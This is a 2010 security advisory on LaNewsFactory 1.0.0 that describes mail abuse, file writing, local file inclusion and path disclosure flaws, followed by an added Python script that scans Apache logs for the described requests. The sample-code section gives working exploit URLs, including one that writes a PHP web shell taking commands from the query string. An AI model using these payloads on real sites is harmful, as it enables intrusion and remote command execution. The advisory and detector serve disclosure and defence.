
LaNewsFactory 1.0.0 Anonymous Email / Command Execution

Date: 24 Apr 2010. Reported by: Salvatore Fresta. Type: packetstorm. Source: packetstormsecurity.com

LaNewsFactory 1.0.0 Multiple Remote Vulnerabilities

Code
`  
  
LaNewsFactory Multiple Remote Vulnerabilities  
http://www.salvatorefresta.net/files/adv/LaNewsFactory%20Multiple%20Remote%20Vulnerabilities-19042010.txt  
  
Name LaNewsFactory  
Vendor Christophe Brocas  
Versions Affected <= 1.0.0  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2010-04-19  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
VI. DISCLOSURE TIMELINE  
  
  
I. ABOUT THE APPLICATION  
  
This is a widely used news manager that does not require a  
database.  
  
  
II. DESCRIPTION  
  
This news manager is affected by many vulnerabilities  
that allow a guest to write arbitrary files on the  
system, include local files, read local files, etc.  
  
  
III. ANALYSIS  
  
Summary:  
  
A) Anonymous email  
B) Remote File Writing  
C) Multiple Local File Inclusion  
D) Full Path Disclosure  
  
A) Anonymous email  
  
The mailto.php file allows a guest to send arbitrary emails.  
The input is not properly sanitised:  
  
if (ValidEmailAdress($youremail) and ValidEmailAdress($friendemail))  
{  
mail ($friendemail, $display[$lang]["mailtoafriend"],"$comments\n\n".$url."print".$LNF_file_extension."?art=$newsfilename\n\n$yourname", "From: $youremail");  
  
  
B) Remote File Writing  
  
The save-edited-news.php file allows a guest to write a  
file on the system. This vulnerability may be used to  
execute remote commands on the system.  
  
  
C) Multiple Local File Inclusion  
  
Many files pass unsanitised input to the PHP include  
function. This vulnerability may be used to execute  
remote commands by including the Apache log file.  
  
  
D) Full Path Disclosure  
  
For example, the print.php file prints many errors that  
include the full path of the file. This path may be  
very useful for local file inclusion and other attacks.  
  
  
  
IV. SAMPLE CODE  
  
A) Anonymous email  
  
[email protected]&[email protected]&comments=suck!  
  
  
B) Remote File Writing to Remote Command Execution  
  
save-edited-news.php?art=news/file.php&corps=<?php system($_GET[cmd]); ?>  
  
  
D) Full Path Disclosure  
  
print.php?art=-1.xml  
  
  
V. FIX  
  
No fix.  
  
  
VI. DISCLOSURE TIMELINE  
  
2010-04-19 Bugs discovered  
2010-04-19 Advisory released  
  
  
`
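
A log check for the requests described in sections B and C, as an added example that is not part of the original advisory or of LaNewsFactory: it scans Apache access-log lines for `save-edited-news.php` writes whose `art` target is not an `.xml` file or whose `corps` body contains a PHP open tag, and for `art` values that leave the news directory. The log lines, the `/lnf/` install path, the finding names and the rule that legitimate news files end in `.xml` are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (documentation IPs, assumed /lnf/ install path).
SAMPLE_LOG = """\
192.0.2.10 - - [24/Apr/2010:10:00:01 +0000] "GET /lnf/print.php?art=20100419-1.xml HTTP/1.1" 200 5120
192.0.2.44 - - [24/Apr/2010:10:02:13 +0000] "GET /lnf/save-edited-news.php?art=news/file.php&corps=%3C%3Fphp+echo+1%3B+%3F%3E HTTP/1.1" 200 312
192.0.2.44 - - [24/Apr/2010:10:02:40 +0000] "GET /lnf/print.php?art=-1.xml HTTP/1.1" 200 845
192.0.2.51 - - [24/Apr/2010:10:05:09 +0000] "GET /lnf/print.php?art=../../example.log HTTP/1.1" 200 9021
192.0.2.10 - - [24/Apr/2010:10:06:30 +0000] "GET /lnf/index.php HTTP/1.1" 200 7001
"""

# Client address and request target from a common/combined log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(path, params):
    """Return the findings for one request (decoded query parameters)."""
    findings = []
    script = path.rsplit("/", 1)[-1]
    art = params.get("art", [""])[0]
    corps = params.get("corps", [""])[0]
    if script == "save-edited-news.php":
        # Assumption: the editor only ever needs to write .xml news files.
        if art and not art.lower().endswith(".xml"):
            findings.append("write-non-xml")
        if "<?" in corps:
            findings.append("write-php-body")
    # Any script: an art value that climbs out of the news directory.
    if art and (".." in art or art.startswith("/") or "\x00" in art):
        findings.append("art-path-escape")
    return findings

def scan(log_text):
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        findings = classify(url.path, parse_qs(url.query, keep_blank_values=True))
        if findings:
            hits.append((client, url.path, findings))
    return hits

if __name__ == "__main__":
    for client, path, findings in scan(SAMPLE_LOG):
        print(client, path, ",".join(findings))
```

The `print.php?art=-1.xml` request from section D looks like a normal article request in the log, so it is left unflagged here; turning off PHP's `display_errors` is what keeps the path out of the response.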
